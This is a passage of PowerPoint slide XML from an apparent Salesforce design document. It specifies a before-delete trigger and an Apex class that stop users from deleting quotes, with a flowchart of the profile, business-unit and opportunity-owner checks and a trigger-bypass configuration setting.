            <a:chOff x="521" y="23"/>
            <a:chExt cx="3153" cy="663"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="55376" name="Group 56"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="521" y="23"/>
              <a:ext cx="3153" cy="663"/>
              <a:chOff x="725" y="1025"/>
              <a:chExt cx="4990" cy="2859"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="55387" name="Picture 5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" y="1026"/>
                <a:ext cx="4990" cy="2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388" name="Rectangle 15"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="770" y="1025"/>
                <a:ext cx="4850" cy="27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  <a:buFontTx/>
                  <a:buChar char="»"/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" sz="800" b="1"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="55377" name="AutoShape 59"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="55381" idx="3"/>
              <a:endCxn id="55386" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1587" y="391"/>
              <a:ext cx="31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diamond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5378" name="Text Box 60"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1544" y="384"/>
              <a:ext cx="4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ヒラギノ角ゴ ProN W3"/>
                  <a:cs typeface="ヒラギノ角ゴ ProN W3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600" b="1"/>
                <a:t>Opportunity</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="55379" name="Group 61"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1905" y="255"/>
              <a:ext cx="499" cy="181"/>
              <a:chOff x="4173" y="1117"/>
              <a:chExt cx="499" cy="181"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55385" name="Rectangle 62"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4173" y="1117"/>
                <a:ext cx="499" cy="91"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="tx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Opportunity</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55386" name="Rectangle 63"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4173" y="1208"/>
                <a:ext cx="499" cy="90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800" b="1"/>
                  <a:t>- OwnerId</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55380" name="Rectangle 64"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="612" y="187"/>
              <a:ext cx="975" cy="91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900" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Quote</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55381" name="Rectangle 65"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="612" y="278"/>
              <a:ext cx="975" cy="22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5000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="40000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="accent2"/>
                </a:buClr>
                <a:buSzPct val="130000"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-GB" sz="700" b="1"/>
                <a:t>- Business Unit</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-GB" sz="700" b="1"/>
              </a:br>
              <a:r>
                <a:rPr lang="fr-FR" sz="700" b="1"/>
                <a:t>- Opportunity</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" sz="700" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="55382" name="Group 66"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2653" y="187"/>
              <a:ext cx="884" cy="363"/>
              <a:chOff x="3470" y="1049"/>
              <a:chExt cx="884" cy="363"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55383" name="Rectangle 67"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3470" y="1049"/>
                <a:ext cx="884" cy="91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900" b="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>User</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55384" name="Rectangle 68"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3470" y="1140"/>
                <a:ext cx="884" cy="272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</a:pPr>
                <a:r>
                  <a:rPr lang="en-GB" sz="700" b="1"/>
                  <a:t>- Bypass Apex Triggers</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-GB" sz="700" b="1"/>
                </a:br>
                <a:r>
                  <a:rPr lang="en-GB" sz="700" b="1"/>
                  <a:t>- Profile</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-GB" sz="700" b="1"/>
                </a:br>
                <a:r>
                  <a:rPr lang="en-GB" sz="700" b="1"/>
                  <a:t>- Id</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="255111" name="Group 135"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4953000" y="3414713"/>
          <a:ext cx="1371600" cy="1097280"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="646113"/>
                <a:gridCol w="725487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Effort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1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Config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0.5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Doc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0.5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2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112" name="Group 136"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2743200" y="3494088"/>
          <a:ext cx="1476375" cy="950952"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="973138"/>
                <a:gridCol w="503237"/>
              </a:tblGrid>
              <a:tr h="2377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Deliverables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 testing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Apex triggers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Apex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AP12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88" y="1905000"/>
            <a:ext cx="8177212" cy="4343400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" smtClean="0"/>
              <a:t>Update configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" smtClean="0"/>
              <a:t>User.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" smtClean="0"/>
              <a:t>Bypass_Apex_triggers__c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="900" smtClean="0"/>
              <a:t>Add the value “AP12”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" smtClean="0"/>
              <a:t>Remove opportunity validation Rule «  CORE_Deleting_UCI_Quote »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" smtClean="0"/>
              <a:t>Remove fields  N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IE" sz="1000" smtClean="0"/>
              <a:t>b_of_Product__c, Nb_of_Service__c</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="400" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" smtClean="0"/>
              <a:t>Create a new trigger on Quote__c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" smtClean="0"/>
              <a:t>QuoteBeforeDelete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" smtClean="0"/>
              <a:t>If User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="900" smtClean="0"/>
              <a:t>not bypassing AP12 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="900" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" smtClean="0"/>
              <a:t>Call a new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="900" smtClean="0"/>
              <a:t>AP12Quote.PreventFromDeleting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="900" smtClean="0"/>
              <a:t>() passing trigger.old.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-GB" sz="400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" smtClean="0"/>
              <a:t>Create a new Class </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" smtClean="0"/>
              <a:t>AP12Quote</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" smtClean="0"/>
              <a:t>Create a method PreventFromDeleting(), bulk compliant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1000" smtClean="0"/>
              <a:t>Create a bulk compliant testmethod, checking the full development scope (both triggers and all conditions of the class method, validating all cases in the slide ‘test cases’)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Algorithm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3660775" y="1500188"/>
            <a:ext cx="1584325" cy="3952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1200" b="1"/>
              <a:t>Before delete</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1200" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="800"/>
              <a:t>QuoteBeforeDelete</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57350" name="AutoShape 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4019550" y="2071688"/>
            <a:ext cx="860425" cy="357187"/>
          </a:xfrm>
          <a:prstGeom prst="diamond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1000"/>
              <a:t>Bypass ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57351" name="AutoShape 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="57349" idx="2"/>
            <a:endCxn id="57350" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4363244" y="1981994"/>
            <a:ext cx="176213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3479800" y="2649538"/>
            <a:ext cx="1946275" cy="541337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1100" b="1"/>
              <a:t>Call</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1100" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="800"/>
              <a:t>AP12Quote.PreventFromDeleting</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="800"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="800"/>
              <a:t>(trigger.old) </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57353" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3479800" y="5133975"/>
            <a:ext cx="1944688" cy="827088"/>
          </a:xfrm>
          <a:prstGeom prst="diamond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800"/>
              <a:t>CurrentUser.Profile</a:t>
            </a:r>
          </a:p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800"/>
              <a:t>from the Quote BU ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57354" name="AutoShape 12"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="57350" idx="2"/>
            <a:endCxn id="57352" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="4341019" y="2537619"/>
            <a:ext cx="220663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4379913" y="2360613"/>
            <a:ext cx="3302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No</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57356" name="AutoShape 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3732213" y="2246313"/>
            <a:ext cx="277812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57" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="2068513"/>
            <a:ext cx="3810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Yes</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57358" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="2144713"/>
            <a:ext cx="7556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Do Nothing</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57359" name="AutoShape 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="57352" idx="2"/>
            <a:endCxn id="57365" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4452938" y="3200400"/>
            <a:ext cx="1587" cy="2317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60" name="Oval 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4044950" y="4376738"/>
            <a:ext cx="822325" cy="468312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For</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="900"/>
              <a:t>each</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="900"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="900"/>
              <a:t>Quote</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57361" name="AutoShape 19"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="57375" idx="3"/>
            <a:endCxn id="57368" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="5245100" y="6491288"/>
            <a:ext cx="719138" cy="15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62" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="5334000"/>
            <a:ext cx="381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Yes</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57363" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4416425" y="4089400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No</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57364" name="AutoShape 22"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="57353" idx="1"/>
            <a:endCxn id="57360" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3470275" y="4611688"/>
            <a:ext cx="565150" cy="936625"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -11801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65" name="AutoShape 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3935413" y="3441700"/>
            <a:ext cx="1038225" cy="684213"/>
          </a:xfrm>
          <a:prstGeom prst="diamond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800"/>
              <a:t>ProfileName</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="800"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="800"/>
              <a:t>contains UCI ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57366" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4194175" y="599757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No</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57367" name="AutoShape 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="57365" idx="1"/>
            <a:endCxn id="57372" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3379788" y="3784600"/>
            <a:ext cx="546100" cy="196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68" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5964238" y="6365875"/>
            <a:ext cx="1346200" cy="250825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800"/>
              <a:t>Throw the error message</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57369" name="Text Box 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3803650" y="4737100"/>
            <a:ext cx="4381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Loop</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57370" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3552825" y="3621088"/>
            <a:ext cx="3810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Yes</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57371" name="AutoShape 29"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="57360" idx="1"/>
            <a:endCxn id="57372" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3379788" y="4189413"/>
            <a:ext cx="785812" cy="2460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72" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3192463" y="3981450"/>
            <a:ext cx="3746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Exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57373" name="AutoShape 31"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="57365" idx="2"/>
            <a:endCxn id="57360" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4454525" y="4135438"/>
            <a:ext cx="1588" cy="2317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74" name="AutoShape 32"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="57360" idx="4"/>
            <a:endCxn id="57353" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4452938" y="4854575"/>
            <a:ext cx="3175" cy="2698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75" name="AutoShape 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3659188" y="6213475"/>
            <a:ext cx="1585912" cy="558800"/>
          </a:xfrm>
          <a:prstGeom prst="diamond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800"/>
              <a:t>Opportunity.Owner</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="800"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="800"/>
              <a:t>is current user ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57376" name="AutoShape 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="57353" idx="2"/>
            <a:endCxn id="57375" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="4325938" y="6086475"/>
            <a:ext cx="252412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377" name="AutoShape 35"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="57375" idx="1"/>
            <a:endCxn id="57360" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3659188" y="4610100"/>
            <a:ext cx="385762" cy="1882775"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -18025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378" name="Text Box 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3371850" y="6321425"/>
            <a:ext cx="3810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Yes</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57379" name="Text Box 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5208588" y="6321425"/>
            <a:ext cx="330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fr-FR" sz="900"/>
              <a:t>No</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="57380" name="AutoShape 38"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="57368" idx="0"/>
            <a:endCxn id="57360" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4874419" y="4602956"/>
            <a:ext cx="1755775" cy="1770063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Unit tests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" b="1" i="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="124984" name="Group 56"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="2667000"/>
